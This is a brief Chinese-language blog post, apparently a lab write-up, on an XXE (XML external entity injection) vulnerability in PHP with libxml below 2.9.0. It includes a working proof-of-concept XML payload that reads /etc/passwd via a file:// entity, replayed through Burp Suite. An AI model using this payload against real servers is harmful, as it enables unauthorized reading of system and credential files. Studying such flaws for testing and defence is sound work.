互动

php【libxml version 2.8.0】漏洞

Aurora 字数: 2229 阅读耗时: 5 分钟 2025/05/07 2025/05/07 博客独享热度: 18 评论: 0

php-->libxml版本低于2.9.0时存在XML外部实体注入漏洞（XXE）

默认目录下有dom.php、index.php、SimpleXMLElement.php、simplexml_load_string.php其中dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞。

POC

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe[ 
    <!ELEMENT test ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>	
<test>
    <name>&xxe;</name>
</test>

测试

bp进行数据包修改和重放

将file协议访问/etc/passwd的值赋予给xxe，然后再xml正文中引用

Aurora

分享知识与科技生活

打赏作者

感谢你赐予我前进的力量

微信
支付宝

赞赏者名单

因为你们的支持让我意识到写文章的价值🙏

本文是原创文章，采用 CC BY-NC-ND 4.0 协议，完整转载请注明来自 Aurora

php 1 XXE 1 外部实体注入 1

阅读建议

匿名评论隐私政策

你无需删除空行，直接评论以获取最佳展示效果

你好啊！

专业的网络安全与渗透测试实战平台，提供AI安全应用开发指南及安全编程代码解析。涵盖Web攻防演练、漏洞修复方案、CTF挑战教程、智能安全系统开发，助力提升数字安全防护能力。

网络安全攻城狮

分享网络安全知识、编程与生活